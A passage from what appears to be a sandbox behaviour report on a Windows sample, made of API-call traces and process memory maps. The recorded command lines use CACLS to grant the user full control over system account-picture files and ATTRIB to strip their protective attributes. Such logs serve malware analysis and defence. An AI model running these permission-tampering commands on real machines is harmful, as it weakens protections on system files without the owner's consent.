returned 1 [0183.785] CloseHandle (hObject=0x50) returned 1 [0183.785] _vsnwprintf (in: _Buffer=0x2aef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee50 | out: _Buffer="00000000") returned 8 [0183.785] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.785] GetEnvironmentStringsW () returned 0x432410* [0183.786] FreeEnvironmentStringsW (penv=0x432410) returned 1 [0183.786] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.786] GetEnvironmentStringsW () returned 0x432410* [0183.786] FreeEnvironmentStringsW (penv=0x432410) returned 1 [0183.786] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeea8 | out: lpAttributeList=0x2aeea8) [0183.786] GetConsoleTitleW (in: lpConsoleTitle=0x2af28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.786] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.786] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0183.786] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.786] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.786] GetLastError () returned 0x2 [0183.786] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.787] GetLastError () returned 0x2 [0183.787] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0x42e4d8 [0183.787] FindClose (in: hFindFile=0x42e4d8 | out: hFindFile=0x42e4d8) returned 1 [0183.787] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0xffffffff [0183.787] GetLastError () returned 0x2 [0183.787] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb28) returned 0x42e4d8 [0183.787] FindClose (in: hFindFile=0x42e4d8 | out: hFindFile=0x42e4d8) returned 1 [0183.787] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0183.787] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0183.787] GetConsoleTitleW (in: lpConsoleTitle=0x2af020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.787] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aef70 | out: lpAttributeList=0x2aeea8, lpSize=0x2aef70) returned 1 [0183.787] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeea8, lpPreviousValue=0x0) returned 1 [0183.787] GetStartupInfoW (in: lpStartupInfo=0x2aee64 | out: lpStartupInfo=0x2aee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0183.787] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0183.787] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef04*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef50 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", lpProcessInformation=0x2aef50*(hProcess=0x4c, hThread=0x50, dwProcessId=0x448, dwThreadId=0x608)) returned 1 [0183.789] CloseHandle (hObject=0x50) returned 1 [0183.789] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0183.789] GetEnvironmentStringsW () returned 0x432410* [0183.789] FreeEnvironmentStringsW (penv=0x432410) returned 1 [0183.789] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0183.822] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2aee44 | out: lpExitCode=0x2aee44*=0x0) returned 1 [0183.822] CloseHandle (hObject=0x4c) returned 1 [0183.822] _vsnwprintf (in: _Buffer=0x2aef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee50 | out: _Buffer="00000000") returned 8 [0183.822] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0183.822] GetEnvironmentStringsW () returned 0x432410* [0183.822] FreeEnvironmentStringsW (penv=0x432410) returned 1 [0183.822] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0183.822] GetEnvironmentStringsW () returned 0x432410* [0183.822] FreeEnvironmentStringsW (penv=0x432410) returned 1 [0183.822] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeea8 | out: lpAttributeList=0x2aeea8) [0183.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.822] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.822] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.822] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.822] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.822] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.823] SetConsoleInputExeNameW () returned 0x1 [0183.823] GetConsoleOutputCP () returned 0x1b5 [0183.823] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.823] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.823] exit (_Code=0) Process: id = "359" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16a80" os_pid = "0xda8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "358" os_parent_pid = "0xe50" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26048 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26049 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26050 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26051 start_va = 0xf0000 end_va = 0xf8fff entry_point = 0xf0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26052 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26053 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26054 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26055 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26056 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 26057 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26058 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26059 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26060 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26061 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 26062 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 26063 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26064 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26065 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26066 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26067 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26068 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26069 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 515 os_tid = 0x7d4 Thread: id = 516 os_tid = 0x8ac Process: id = "360" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0x448" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "358" os_parent_pid = "0xe50" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26070 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26071 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26072 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26073 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26074 start_va = 0xc90000 end_va = 0xc96fff entry_point = 0xc90000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26075 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26076 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26077 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26078 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26079 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26080 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26081 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26082 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26083 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26084 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 26085 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26086 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26087 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26088 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26089 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26090 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26091 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26092 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26093 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26094 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26095 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26096 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26097 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26098 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26099 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 517 os_tid = 0x608 Process: id = "361" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x5d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26100 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26101 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26102 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26103 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 26104 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26105 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26106 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26107 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26108 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 26109 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26110 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26111 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26112 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 26113 start_va = 0x2d0000 end_va = 0x336fff entry_point = 0x2d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26114 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 26115 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26116 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26117 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26118 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26119 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26120 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26121 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26122 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26123 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26124 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 26125 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26126 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26127 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 26128 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 26129 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26130 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 26131 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 26132 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 26133 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 26134 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 518 os_tid = 0xf6c [0183.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfe6c | out: lpSystemTimeAsFileTime=0x2cfe6c*(dwLowDateTime=0xa28cc460, dwHighDateTime=0x1d440a9)) [0183.953] GetCurrentProcessId () returned 0x5d0 [0183.953] GetCurrentThreadId () returned 0xf6c [0183.953] GetTickCount () returned 0x34a86 [0183.953] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfe64 | out: lpPerformanceCount=0x2cfe64*=24074203274) returned 1 [0183.953] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0183.953] __set_app_type (_Type=0x1) [0183.953] __p__fmode () returned 0x76b331f4 [0183.953] __p__commode () returned 0x76b331fc [0183.954] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0183.954] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0183.954] GetCurrentThreadId () returned 0xf6c [0183.954] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf6c) returned 0x38 [0183.954] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.954] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0183.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.954] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0183.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfdfc | out: phkResult=0x2cfdfc*=0x0) returned 0x2 [0183.954] VirtualQuery (in: lpAddress=0x2cfe33, lpBuffer=0x2cfdcc, dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.954] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfdcc, dwLength=0x1c | out: lpBuffer=0x2cfdcc*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0183.954] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfdcc, 